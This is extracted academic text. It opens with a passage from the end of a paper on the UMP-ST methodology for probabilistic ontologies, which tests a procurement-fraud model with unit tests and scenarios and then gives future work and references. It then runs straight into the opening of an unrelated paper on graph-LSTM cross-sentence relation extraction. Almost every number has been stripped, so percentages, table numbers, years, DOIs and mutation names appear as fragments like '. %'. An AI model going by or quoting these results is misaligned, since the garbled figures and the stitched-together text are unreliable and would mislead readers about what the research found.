defined during the analysis & design stage were implemented, validating the semantics of the concepts carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. described by the model, etc. this is an important step towards achieving consistency in our model, especially if it was designed by more than one expert. elicitation review can also confirm that the rules as defined correctly reflect stakeholder requirements. the traceability matrices are a useful tool for verifying whether all the requirements were addressed in the final implementation of the model. by looking at the matrix tracing mfrags to rules, we can verify that all the rules defined during analysis & design have been covered. the traceability matrix of table , defined during analysis & design, ensured that the rules covered all the defined requirements. therefore, by composing these matrices, we can infer that all the requirements have been implemented in our model. this review should also confirm that important stakeholder requirements were not missed during analysis & design. of course, an initial implementation will often intentionally cover only a subset of the stakeholder requirements, with additional requirements being postponed for later versions. lessons learned during implementation are reviewed at this stage and priorities for future iterations are revisited and revised. importance analysis is a model validation technique described by laskey & mahoney ( ). a form of sensitivity analysis, its purpose is to verify that selected parts of the model behave as intended. in importance analysis, one or more focus rvs are specified and their behavior is examined under different combinations of values for evidence rvs. the output is a plot for each focus rv that orders the evidence rvs by how much changes in the value of the evidence rv affect the probability of the focus rv. importance analysis is an important type of unit testing. in the case of pr-owl, we can analyze the behavior of the random variables of interest given evidence per mfrag. this mfrag testing is important to capture local consistency of the model and to help localize the source of any problems identified in the model. the tests designed in this section as well as the model described in this paper were developed with the help of experts from the department of research and strategic information from cgu. they provided detailed information on the different types of frauds as well as on evidence that they usually search for when auditing contracts during the internal control activities. furthermore, they have also validated the proof-of-concept model described in this paper with the tests we will describe as well as others that were omitted due to space restrictions. as an example of unit testing, we demonstrate how to define different scenarios to test the judgment history mfrag. essentially, we want to verify how the query hascleanhistory(person) will behave in light of different set of evidence for a person’s criminal and administrative history. results for just one combination of states for the parent rvs are shown in fig. , which shows three distinct scenarios for a -node model. the model assesses whether or not a given person (person in the figure) has a clean history. it consists of a binary rv with two parents. each parent represents whether or not the person has been convicted, investigated, or not investigated in a criminal process (hascriminalhistory__person ) or in an administrative process (hasadministrativehistory__person ). figure a shows the model with no evidence entered (all nodes in yellow with non-zero probabilities), which carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure results of unit testing for the judgment history mfrag. results in a marginal ‘‘a priori’’ probability of . % that any given person would not have a clean history. figure b shows the model results when knowledge about neverinvestigated is entered in the hascriminalhistory_person rv (hascriminalhistory__person node is colored in gray to show that it is observed). this causes a slight reduction in the belief that person does not have a clean history (down from . % to . %). finally, fig. c shows the model’s results when evidence on person having a criminal conviction and never being investigated on an administrative process are entered (both parents now shown in gray with % probability on the observed value). a systematic unit test would examine other combinations as well (carvalho, ). it is important that unit testing achieve as much coverage as possible, and that results be analyzed by verifying that posterior probabilities behave as expected. in our case, the posterior probabilities are consistent with the expected result as defined by the expert. case-based evaluation is conducted by defining a range of different scenarios and examining the results produced by the system for each of the scenarios. case-based evaluation is a system level test appropriate for integration testing. for our procurement po, we define scenarios with evidence represented in different mfrags. this means that each query response will require instantiating multiple parts of the model, helping to validate how the model works as a whole. this validation is important to whether the model’s global performance matches the specialist’s knowledge. it is important to try out different scenarios in order to capture the nuances of the model. in fact, it is a good practice to design the scenarios in order to cover the range of requirements the model must satisfy (wiegers, ; sommerville, ). although it is impossible to cover every scenario we might encounter, we should aim for good coverage, and especially look for important ‘‘edge cases.’’ a traceability matrix relating unit tests and case-based evaluation scenarios to mfrags is a useful tool to ensure that test scenarios have achieved sufficient coverage. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the ssbn generated for this scenario is shown in carvalho ( ), provided as supplemental information. keeping in mind the need to evaluate a range of requirements, we illustrate case-based evaluation with three qualitatively different scenarios. the first one concerns a regular procurement with no evidence to support the hypothesis of an improper procurement or committee. the second one has conflicting evidence in the sense that some supports the hypothesis of having an improper procurement or committee but some does not. finally, in the third scenario there is overwhelming evidence supporting the hypothesis of an improper procurement or committee. when defining a scenario, it is important to define the hypothesis being tested and what is the expected result, besides providing the evidence which will be used. table presents a comparison between all three scenarios. it can be seen that the difference between the first and the second scenarios is that member was never investigated administratively in the first scenario, but was in the second. in the third scenario, however, besides having the evidence that member was investigated, we also have the evidence that person and live at the same address and that person lives at the same address as member . in the first scenario, we expect that procurement will not be deemed improper since the members of the committee have never been investigated in either administrative or criminal instances and we have no relevant information about the owners of the enterprises participating in the procurement. when the query is presented to the system, the needed mfrags are retrieved and instantiated for the entities relevant to the scenario, resulting in an ssbn that answers the query. figure shows part of the ssbn generated from scenario . evidence includes the fact that member , who in this ssbn is part of the procurement process being assessed, has never been investigated in either an administrative process or in a criminal process. as expected, the probability of both isimproperprocurement(procurement ) = true and isimpropercommittee(procurement ) = true are low, . % and . %, respectively. in other words, the procurement is unlikely to be improper given the evidence entered so far. in the second scenario, one of the three members of the committee was previously investigated in the administrative instance. all other evidence is the same as in the previous scenario. we expect that this new piece of evidence should not be strong enough to make the procurement improper, although the probability of being improper should be higher than in the first scenario. the results of inference are as expected. the probability of isimproperprocurement (procurement ) = true and isimpropercommittee(procurement ) = true are . % and . %, respectively. in other words, the probability increased but it is still relatively unlikely. however, depending on the stringency of the threshold, this case might be flagged as warranting additional attention. finally, in the third scenario, we have evidence that the owners of two different enterprises participating in the procurement process live at the same address. since there are only three enterprises participating in the procurement, the competition requirement is compromised. thus, the procurement is likely to be improper. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supplemental-information https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison of all three scenarios. scenario hypothesis and expected result evidence result evidence that apply to all scenarios: hascriminalhistory(member )=neverinvestigated hasprocurementowner(procurement )= agency ismemberofcommittee(member , procurement )= true ismemberofcommittee(member , procurement )= true ismemberofcommittee(member , procurement )= true isparticipantin(enterprise , procurement )= true isparticipantin(enterprise , procurement )= true isparticipantin(enterprise , procurement )= true isprocurementfinished(procurement )= false isresponsiblefor(person , enterprise )= true isresponsiblefor(person , enterprise )= true isresponsiblefor(person , enterprise )= true evidence unique to this scenario: low probability that isimproperprocurement (procurement )= true low probability that isimpropercommittee (procurement )= true hasadministrativehistory(member )=neverinvestigated . % that isimproperprocurement (procurement )= true . % that isimpropercommittee (procurement )= true probability that isimproperprocurement (procurement ) = true%, between % and % . % that isimproperprocurement (procurement )= true probability that isimpropercommittee (procurement )= true%, between % and % evidence unique to this scenario: hasadministrativehistory(member )= investigated . % that isimpropercommittee (procurement )= true probability that isimproperprocurement (procurement )=%, true greater than % . % that isimproperprocurement (procurement )= true probability that isimpropercommittee (procurement )=%, true between % and % evidence unique to this scenario: hasadministrativehistory(member )= investigated livesatsameaddress(person , person ) livesatsameaddress(person , member ) . % that isimpropercommittee (procurement )= true c arvalho etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the ssbn generated for this scenario is shown in carvalho ( ), provided as supplemental information. figure part of the ssbn generated for the first scenario. as expected, the probability of isimproperprocurement(procurement ) = true and isimpropercommittee(procurement ) = true are much larger, at . % and . %, respectively. notice that although the probability of having an improper procurement correctly increased to a value greater than %, the probability of having an improper committee has not changed, since there is no new evidence supporting this hypothesis. the cases presented here are meant to illustrate the ump-st. a full case-based evaluation would consider a broad range of cases with good coverage of the intended use of the model. applicability of ump-st to other domains in this paper, we focused on the fraud identification use case as a means to illustrate the core ideas of the ump-st. we chose this use case because its applicability was clear and its benefits have been independently tested (the methodology is currently being evaluated for use by the brazilian office of the comptroller general). nevertheless, the methodology is applicable to any problem requiring the development of a probabilistic ontology. other examples of using the technique can be found in the terrorist identification domain (haberlin, costa & laskey, ) and the maritime situation awareness (mda) domain (haberlin, ; carvalho et al., ). for instance, the latter involved the development of a probabilistic ontology as part of the prognos (probabilistic ontologies for net-centric operation systems) project (costa, laskey & chang, ; carvalho et al., ), in which pr-owl was chosen as the ontology language due to its comprehensive treatment of uncertainty, use of a highly expressive first-order bayesian language, and compatibility with owl. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supplemental-information https://peerj.com http://dx.doi.org/ . /peerj-cs. the mda probabilistic ontology is designed for the problem of identifying whether a given vessel is a ship of interest. the probabilistic ontology was written in pr-owl, and its development employed the ump-st process. an important aspect is that the development of the pr-owl ontology was initially based on an existing ontology of western european warships that identifies the major characteristics of each combatant class through the attributes of size, sensors, weapons, missions, and nationality. thus, its development was a good case study for applying ump-st to extend an existing ontology to incorporate uncertainty. during its development, the mda ontology was evaluated for face validity with the help of semantic technology experts with knowledge of the maritime domain. this evaluation effort had issues in getting feedback from a sufficiently large number of experts, but the overall result of the evaluation suggests the ump-st not only as viable and applicable to the problem it supports but also a promising approach for using semantic technology in complex domains (haberlin, ). more recently, alencar ( ) applied the ump-st process to create a po for supporting the decision of whether or not to proceed with live data forensic acquisition. besides using the ump-st, several tools and techniques shown in this paper were also applied: the use of uml class diagrams to identify the main entities, attributes, and relations for the model; the use of a traceability matrix to facilitate further improvements in the model; the implementation of the po using pr-owl and unbbayes; and the validation of the model using both unit testing and case-based evaluation. future work a natural next step in this research is the development of automated tools to support the ump-st. it is useful to have a tool to guide the user through the steps necessary to create a probabilistic ontology and link this documentation to its implementation in the unbbayes pr-owl plug-in. a tool to support this documentation process has been developed by the group of artificial intelligence (gia, grupo de inteligência artificial, in portuguese) from the universidade de brasília, brazil (de souza, ; santos et al., ; carvalho et al., ). penetration of semantic technology into serious applications cannot rely only on hand- engineered ontologies. there has been a robust literature on ontology learning (hazman, r. el-beltagy & rafea, ) and learning of expressive probabilistic representations (getoor & taskar, ; de raedt, ; luna, revoredo & cozman, ), and there is robust research activity on the topic. the probability specification step of the pomc could combine both expert-specified probability distributions and probability distributions learned from data. practicing ontology engineers and the semantic technology community would benefit from widely available ontological engineering tools that support ump-st, provide scalable inference and support learning. in addition, there are other disciplines not discussed in this paper that are essential for practical ontology engineering, such as configuration management and user experience design. further, the ump-st process would benefit carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. from a more detailed description of the activities performed, roles involved, and artifacts produced in its application. the eclipse process framework (epf) could be employed to provide a structured way to present the disciplines, activities, best practices, roles, etc. as customizable software process engineering framework, epf has two major goals (eclipse foundation, ): • ‘‘to provide an extensible framework and exemplary tools for software process engineering - method and process authoring, library management, configuring and publishing a process.’’ • ‘‘to provide exemplary and extensible process content for a range of software development and management processes supporting iterative, agile, and incremental development, and applicable to a broad set of development platforms and applications’’. capturing ump-st within epf will provide guidance and tools to a broad community of developers for following the ump-st to develop probabilistic ontologies. a process that is made freely available with the epf framework is the openup (balduino, ) which is a minimally sufficient software development process. this process could be used as a starting point to describe the ump-st process, since openup is extensible to be used as foundation on which process content can be added or tailored as needed. two major challenges must be addressed to enable broad use of semantically rich uncertainty management methods. the first is scalability. there have been some attempts to grapple with the inherent scalability challenges of reasoning with highly expressive probabilistic logics. for example, lifted inference (braz, amir & roth, ) exploits repeated structure in a grounded model to avoid unnecessary repetition of computation. approximate inference methods such as mc-sat and lazy inference (domingos & lowd, ) have been applied to inference in markov logic networks. hypothesis management methods (haberlin, costa & laskey, a; haberlin, costa & laskey, b; laskey, mahoney & wright, ) can help to control the complexity of the constructed ground network. much work remains on developing scalable algorithms for particular classes of problems and integrating such algorithms into ontology engineering tools. finally, ontologies generated using the ump-st process would greatly benefit from methods that can assess how well and comprehensively the main aspects of uncertainty representation and reasoning are addressed. thus, a natural path in further developing the ump-st is to leverage ongoing work in this area, such as the uncertainty representation and reasoning evaluation framework (urref) (costa et al., ; de villiers et al., ) developed by the international society of information fusion’s working group on evaluation of techniques for uncertainty reasoning (eturwg). we are already participating in this effort and plan to leverage its results in the near future. conclusion the uncertainty modeling process for semantic technology (ump-st) addresses an unmet need for a probabilistic ontology modeling methodology. while there is extensive literature on both probability elicitation and ontology engineering, these fields have developed nearly independently and there is little literature on how to bring them together carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to define a semantically rich domain model that captures relevant uncertainties. such expressive probabilistic representations are important for a wide range of domains. there is a robust literature emerging on languages for capturing the requisite knowledge. however, modelers can as yet find little guidance on how to build these kinds of semantically rich probabilistic models. this paper provides such a methodology. ump-st was described and illustrated with a use case on identifying fraud in public procurement in brazil. the use case was presented with a focus on illustrating the activities that must be executed within each discipline in the pomc cycle in the context of the fraud identification problem. the core concepts in applying ump-st to the procurement domain can easily be migrated to completely distinct domains. for instance, it was also used in defining a po for maritime domain awareness (mda) (carvalho, ) which supports the identification of terrorist threats and other suspicious activities in the maritime domain. the mda po evolved through several versions, showing how the ump-st process supports iterative model evolution and enhancement. acknowledgements the authors would like to thank the brazilian office of the comptroller general for their active support since and for providing the human resources necessary to conduct this research. more specifically, the authors would like to thank the department of research and strategic information for providing the experts who explained the fraud domain in detail and provided help on creating and validating the use case described. the authors would also like to thank dr. marcelo ladeira and his students from the universidade de brasília for their work on developing the unbbayes probabilistic network framework, and for providing support to this research as needed. additional information and declarations funding this research was partially supported by the office of naval research (onr), under contract #n - -c- . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: office of naval research (onr): #n - -c- . competing interests kathryn b. laskey is an academic editor for peerj computer science. the authors declare there are no other competing interests. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • rommel n. carvalho conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • kathryn b. laskey conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper, supervised software development, supervised research, directed dr. carvalho’s phd dissertation. • paulo c.g. da costa conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper, supervised software development, served on dr. carvalho’s phd committee. data availability the following information was supplied regarding data availability: the probabilistic ontology tool is available for download from http://sourceforge.net/ projects/unbbayes/. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references adelman l. . evaluating decision support and expert systems. st edition. new york: john wiley & sons, incorporated. alencar db. . use of probabilistic ontologies and multi-entity bayesian networks for defining, modelling, guiding and aiding decision-making forensic processes. m.sc. thesis, forensic computing and cyber crime investigation, university college dublin, dublin, ireland. allemang d, hendler ja. . semantic web for the working ontologist. nd edition. burlington: morgan kaufmann. balduino r. . introduction to openup (open unified process). technical report. the eclipse foundation, ottawa. braz r, amir e, roth d. . lifted first-order probabilistic inference. in: introduction to statistical relational learning. cambridge: mit press. burgman m, fidler f, mcbride m, walshe t, wintle b. . eliciting expert judgments: literature review. technical report. australian centre for excellence in risk analysis (acera), melbourne. carvalho rn. . plausible reasoning in the semantic web using multi-entity bayesian networks—mebn. m.sc. thesis, university of brasilia, brasilia, brazil. carvalho rn. . probabilistic ontology: representation and modeling methodology. phd thesis, george mason university, fairfax, va, usa. carvalho rn, costa pc, laskey kb, chang k. . prognos: predictive situational awareness with probabilistic ontologies. in: proceedings of the th international conference on information fusion. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://sourceforge.net/projects/unbbayes/ http://sourceforge.net/projects/unbbayes/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. carvalho rn, dos santos ll, ladeira m, da rocha ha, mendes gl. . ump-st plug-in: documenting, maintaining and evolving probabilistic ontologies using unbbayes framework. in: uncertainty reasoning for the semantic web iii. new york: springer international publishing, – . carvalho rn, haberlin r, costa pc, laskey kb, chang k. . modeling a probabilis- tic ontology for maritime domain awareness. in: proceedings of the th international conference on information fusion. carvalho rn, ladeira m, santos l, matsumoto s, costa pc. . unbbayes-mebn: comments on implementing a probabilistic ontology tool. in: guimarães n, isaías p, eds. proceedings of the iadis international conference applied computing . algarve: iadis, – . carvalho rn, ladeira m, santos ll, matsumoto s, costa pc. . a gui tool for plausible reasoning in the semantic web using mebn. in: nedjah n, mourelle lm, kacprzyk j, eds. innovative applications in data mining, studies in computational intelligence, vol. . new york: springer, – . carvalho rn, laskey kb, costa pc. . pr-owl . –bridging the gap to owl semantics. in: bobillo f, costa pc, d’amato c, fanizzi n, laskey kb, laske kj, lukasiewicz t, nickles m, pool m, eds. uncertainty reasoning for the semantic web ii. number in lecture notes in computer science. berlin heidelberg: springer, – . clemen rt, reilly t. . making hard decisions with decision tools suite update edition. st edition. pacific grove: cengage learning. costa pc. . bayesian semantics for the semantic web. phd thesis, george mason university, fairfax, va, usa. costa pc, laskey kb, blasch e, jousselme a-l. . towards unbiased evaluation of uncertainty reasoning: the urref ontology. in: proceedings of the fifteenth international conference on information fusion, singapore. piscataway: ieee. costa pc, laskey kb, chang k. . prognos: applying probabilistic ontologies to distributed predictive situation assessment in naval operations. in: proceedings of the fourteenth international command and control research and technology symposium (iccrts ). costa pc, laskey kb, laskey kj. . pr-owl: a bayesian framework for the semantic web. in: proceedings of the first workshop on uncertainty reasoning for the semantic web (ursw ). costa pc, laskey kb, laskey kj. . pr-owl: a bayesian ontology language for the semantic web. in: uncertainty reasoning for the semantic web i: iswc international workshops, ursw – , revised selected and invited papers. berlin: springer- verlag, – . cozman fg, maua dd. . specifying probabilistic relational models with description logics. in: proceedings of the xii encontro nacional de inteligência artificial e computa- cional (eniac). natal, rn, brazil. de hoog r. . methodologies for building knowledge based systems: achievements and prospects. in: liebowitz j, ed. handbook of applied expert systems. chapter . boca raton: crc press. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. de raedt l. . advances in inductive logic programming. fairfax: ios press. de souza rm. . unbbayes plug-in for documenting probabilistic ontologies using ump-st. b.s. thesis, university of brasilia, brasilia, brazil. de villiers j, laskey kb, jousselme a-l, blasch ep, waal ad, pavlin g, costa pc. . representation, quantification and evaluation for data and information fusion. in: proceedings of the eighteenth international conference on information fusion. piscataway: ieee. dhurandhar a, ettl mr, graves bc, ravi rk. a. system and method for identifying procurement fraud/risk. us patent. no. . dhurandhar a, ravi r, graves b, maniachari g, ettl m. b. robust system for identifying procurement fraud. in: proccedings of the twenty-seventh iaai conference. palo alto: aaai press. ding z, peng y, pan r. . bayesowl: uncertainty modeling in semantic web ontologies. in: soft computing in ontologies and semantic web. vol. . berlin / heidelberg: springer, – . domingos p, lowd d. . markov logic: an interface layer for artificial intelligence. st edition. williston: morgan and claypool publishers. druzdzel mj, van der gaag lc. . building probabilistic networks: where do the numbers come from - a guide to the literature, guest editors’ intro- duction. ieee transactions in knowledge and data engineering : – doi . /tkde. . . eclipse foundation. . eclipse process framework project (epf). available at http: //www.eclipse.org/epf/general/description.php. fernández-lópez m, gómez-pérez a, juristo n. . methontology: from ontological art to ontological engineering. in: ontological engineering: papers from the aaai spring symposium. menlo park: aaai press. flores aer. . auditoria y mecanismos anticorrupcion (segunda parte). quipuka- mayoc ( ): – . frizzo h, oliveira pl. . public procurement in brazil: overview. available at http: //us.practicallaw.com/ - - . garthwaite ph, kadane jb, o’hagan a. . statistical methods for eliciting probabil- ity distributions. journal of the american statistical association ( ): – doi . / . gasevic d, djuric d, devedzic v, damjanovi v. . converting uml to owl ontologies. in: proceedings of the th international world wide web conference on alternate track papers & posters. new york: acm, – . getoor l, taskar b. . introduction to statistical relational learning. cambridge: mit press. gomez-perez a, corcho o, fernandez-lopez m. . ontological engineering: with examples from the areas of knowledge management, e-commerce and the semantic web, first edition. new york: springer. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tkde. . http://www.eclipse.org/epf/general/description.php http://www.eclipse.org/epf/general/description.php http://us.practicallaw.com/ - - http://us.practicallaw.com/ - - http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. gotel o, finkelstein c. . an analysis of the requirements traceability problem. in: proceedings of the first international conference on requirements engineering, , – . gregorini a. . auditoria de deteccao de fraude. revista da cgu iv( ): – . haberlin r. . probabilistic ontology reference architecture and development methodology. phd thesis, george mason university. haberlin r, costa pc, laskey kb. a. hypothesis management in support of inferential reasoning. in: proceedings of the fifteenth international command and control research and technology symposium. haberlin r, costa pc, laskey kb. b. a model-based systems engineering approach to hypothesis management. in: proceedings of the third international conference on model-based systems engineering. haberlin r, costa pc, laskey kb. . probabilistic ontology architecture for a terrorist identification decision support system. in: proceedings of the nineteenth international command and control research and technology symposium. hazman m, r. el-beltagy s, rafea a. . a survey of ontology learning approaches. international journal of computer applications ( ): – doi . / - . heckerman d, meek c, koller d. . probabilistic models for relational data. tech report msr-tr- - . microsoft research. huber gp. . methods for quantifying subjective probabilities and multi-attribute utilities*†. decision sciences ( ): – doi . /j. - . .tb .x. incose. . incose systems engineering handbook: a guide for system life cycle processes and activities. fourth edition. new york: wiley. jacobson i, booch g, rumbaugh j. . the unified software development process. boston: addison-wesley professional. kahneman d, slovic p, tversky a. . judgment under uncertainty: heuristics and biases. cambridge: cambridge university press. koller d, levy a, pfeffer a. . p-classic: a tractable probabilistic description logic. in: proceedings of aaai- . menlo park: aaai, – . korb kb, nicholson ae. . bayesian artificial intelligence. st edition. new york: chapman & hall/crc. kruchten p. . the rational unified process: an introduction. edition. boston: addison-wesley professional. laskey kb. . mebn: a language for first-order bayesian knowledge bases. artificial intelligence ( – ): – doi . /j.artint. . . . laskey kb, mahoney sm. . network engineering for agile belief network mod- els. ieee transactions on knowledge and data engineering ( ): – doi . / . . laskey kb, mahoney sm, wright e. . hypothesis management in situation- specific network construction. in: koller d, ed. uncertainty in artificial intelligence: proceedings of the seventeenth conference. san mateo: morgan kaufman, . carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.artint. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. laskey kj, laskey kb. . uncertainty reasoning for the world wide web: report on the urw -xg incubator group. in: proceedings of the fourth international workshop on uncertainty reasoning for the semantic web (ursw ). karlsruhe. lukasiewicz t. . expressive probabilistic description logics. artificial intelligence ( – ): – doi . /j.artint. . . . luna jeo, revoredo k, cozman fg. . learning sentences and assessments in probabilistic description logics. in: proceedings of the th uncertainty reasoning for the semantic web (ursw ) on the th international semantic web conference (iswc ), – . mahoney s, laskey kb. . constructing situation specific belief networks. in: proceedings of the th annual conference on uncertainty in artificial intelligence (uai- ). san francisco: morgan kaufmann. matsumoto s. . framework based in plug-ins for reasoning with probabilistic ontologies. m.sc. thesis, university of brasilia, brasilia, brazil. matsumoto s, carvalho rn, ladeira m, costa pc, santos ll, silva d, onishi m, machado e, cai k. . unbbayes: a java framework for probabilistic models in ai. in: java in academia and research. hong kong: iconcept press. o’hagan a, buck ce, daneshkhah a, eiser jr, garthwaite ph, jenkinson dj, rakow jeoat. . uncertain judgements: eliciting experts’ probabilities. st edition. london: wiley. oliveira a. . licitacao: fraudes comuns nas aquisicoes de bens, enquadramento legal e procedimentos preventivos. undergraduate thesis, universidade federal de santa catarina, florianopolis, santa catarina, brazil. pearl j. . probabilistic reasoning in intelligent systems: networks of plausible inference. st edition. cambridge: morgan kaufmann. project management institute. . a guide to the project management body of knowl- edge (pmbok guide). newtown square: project management institute. reed sl, lenat db. . mapping ontologies into cyc. in: proceedings of the aaai conference workshop on ontologies for the semantic web. – . renooij s. . probability elicitation for belief networks: issues to consider. the knowledge engineering review ( ): – doi . /s . royce ww. . managing the development of large software systems: concepts and techniques. in: proceedings of ieee westcon. piscataway: ieee, – . reprinted in proceedings of the ninth international conference on software engineering, march , pp. . rumbaugh j, jacobson i, booch g. . the unified modeling language reference manual. boston: addison-wesley professional. santos ll, carvalho rn, ladeira m, weigang l. . probabilistic ontologies incre- mental modeling using unbbayes. in: proceedings of encontro nacional de inteligência artificial e computacional, eniac. sao carlos, – . schum da, starace s. . the evidential foundations of probabilistic reasoning. evanston: northwestern university press. sommerville i. . software engineering. edition. boston: addison wesley. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.artint. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. sure y, staab s, studer r. . on-to-knowledge methodology (otkm). in: handbook on ontologies. new york: springer, – . wallsten ts, budescu dv. . encoding subjective probabilities: a psychological and psychometric review. management science ( ): – doi . /mnsc. . . . wiegers ke. . software requirements. nd edition. redmond: microsoft press. winkler rl. . the assessment of prior distributions in bayesian analysis. journal of the american statistical association ( ): – doi . / . . . yang y, calmet j. . ontobayes: an ontology-driven uncertainty model. in: proceed- ings of the international conference on computational intelligence for modelling, control and automation and international conference on intelligent agents, web technologies and internet commerce vol- (cimca-iawtic’ ) - volume . piscataway: ieee computer society, – . carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /mnsc. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. cross-sentence n-ary relation extraction with graph lstms nanyun peng ∗ hoifung poon chris quirk kristina toutanova ∗ wen-tau yih center for language and speech processing, computer science department johns hopkins university, baltimore, md, usa microsoft research, redmond, wa, usa google research, seattle, wa, usa npeng @jhu.edu, kristout@google.com {hoifung,chrisq,scottyih}@microsoft.com abstract past work in relation extraction has focused on binary relations in single sentences. re- cent nlp inroads in high-value domains have sparked interest in the more general setting of extracting n-ary relations that span mul- tiple sentences. in this paper, we explore a general relation extraction framework based on graph long short-term memory networks (graph lstms) that can be easily extended to cross-sentence n-ary relation extraction. the graph formulation provides a unified way of exploring different lstm approaches and in- corporating various intra-sentential and inter- sentential dependencies, such as sequential, syntactic, and discourse relations. a robust contextual representation is learned for the en- tities, which serves as input to the relation clas- sifier. this simplifies handling of relations with arbitrary arity, and enables multi-task learning with related relations. we evaluate this frame- work in two important precision medicine set- tings, demonstrating its effectiveness with both conventional supervised learning and distant supervision. cross-sentence extraction pro- duced larger knowledge bases. and multi-task learning significantly improved extraction ac- curacy. a thorough analysis of various lstm approaches yielded useful insight the impact of linguistic analysis on extraction accuracy. introduction relation extraction has made great strides in newswire and web domains. recently, there has ∗ this research was conducted when the authors were at microsoft research. been increasing interest in applying relation extrac- tion to high-value domains such as biomedicine. the advent of $ human genome heralds the dawn of precision medicine, but progress in personalized can- cer treatment has been hindered by the arduous task of interpreting genomic data using prior knowledge. for example, given a tumor sequence, a molecular tumor board needs to determine which genes and mu- tations are important, and what drugs are available to treat them. already the research literature has a wealth of relevant knowledge, and it is growing at an astonishing rate. pubmed , the online repository of biomedical articles, adds two new papers per minute, or one million each year. it is thus imperative to advance relation extraction for machine reading. in the vast literature on relation extraction, past work focused primarily on binary relations in single sentences, limiting the available information. con- sider the following example: “the deletion mutation on exon- of egfr gene was present in patients, while the l e point mutation on exon- was noted in . all patients were treated with gefitinib and showed a partial response.”. collectively, the two sentences convey the fact that there is a ternary interaction between the three entities in bold, which is not expressed in either sentence alone. namely, tumors with l e mutation in egfr gene can be treated with gefitinib. extracting such knowledge clearly requires moving beyond binary relations and single sentences. n-ary relations and cross-sentence extraction have received relatively little attention in the past. prior http://www.illumina.com/systems/ hiseq-x-sequencing-system.html https://www.ncbi.nlm.nih.gov/pubmed transactions of the association for computational linguistics, vol. , pp. – , . action editor: mark johnson. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. the deletion mutation on exon- of egfr gene was present in patients, while the l e point mutation on exon- was noted in . root det nn prep on prep of nn nsubj cop prep in advcl num det nn nn prep on mark nsubjpass auxpass prep dep nextsent all patients were treated with gefitinib and showed a partial response. det nsubjpass auxpass prep with conj androot dobj det amod figure : an example document graph for a pair of sentences expressing a ternary interaction (tumors with l e mutation in egfr gene respond to gefitinib treatment). for simplicity, we omit edges between adjacent words or representing discourse relations. work on n-ary relation extraction focused on sin- gle sentences (palmer et al., ; mcdonald et al., ) or entity-centric attributes that can be extracted largely independently (chinchor, ; surdeanu and heng, ). prior work on cross-sentence ex- traction often used coreference to gain access to ar- guments in a different sentence (gerber and chai, ; yoshikawa et al., ), without truly model- ing inter-sentential relational patterns. (see section for a more detailed discussion.) a notable excep- tion is quirk and poon ( ), which applied distant supervision to general cross-sentence relation extrac- tion, but was limited to binary relations. in this paper, we explore a general framework for cross-sentence n-ary relation extraction, based on graph long short-term memory networks (graph lstms). by adopting the graph formulation, our framework subsumes prior approaches based on chain or tree lstms, and can incorporate a rich set of linguistic analyses to aid relation extraction. relation classification takes as input the entity representations learned from the entire text, and can be easily ex- tended for arbitrary relation arity n. this approach also facilitates joint learning with kindred relations where the supervision signal is more abundant. we conducted extensive experiments on two im- portant domains in precision medicine. in both dis- tant supervision and supervised learning settings, graph lstms that encode rich linguistic knowledge outperformed other neural network variants, as well as a well-engineered feature-based classifier. multi- task learning with sub-relations led to further im- provement. syntactic analysis conferred a significant benefit to the performance of graph lstms, espe- cially when syntax accuracy was high. in the molecular tumor board domain, pubmed- scale extraction using distant supervision from a small set of known interactions produced orders of magnitude more knowledge, and cross-sentence ex- traction tripled the yield compared to single-sentence extraction. manual evaluation verified that the accu- racy is high despite the lack of annotated examples. cross-sentence n-ary relation extraction let e , · · · ,em be entity mentions in text t . rela- tion extraction can be formulated as a classification problem of determining whether a relation r holds for e , · · · ,em in t . for example, given a cancer patient with mutation v in gene g, a molecular tumor board seeks to find if this type of cancer would re- spond to drug d. literature with such knowledge has been growing rapidly; we can help the tumor board by checking if the respond relation holds for the (d,g,v) triple. traditional relation extraction methods focus on binary relations where all entities occur in the same sentence (i.e., m = and t is a sentence), and cannot handle the aforementioned ternary relations. moreover, as we focus on more complex relations and 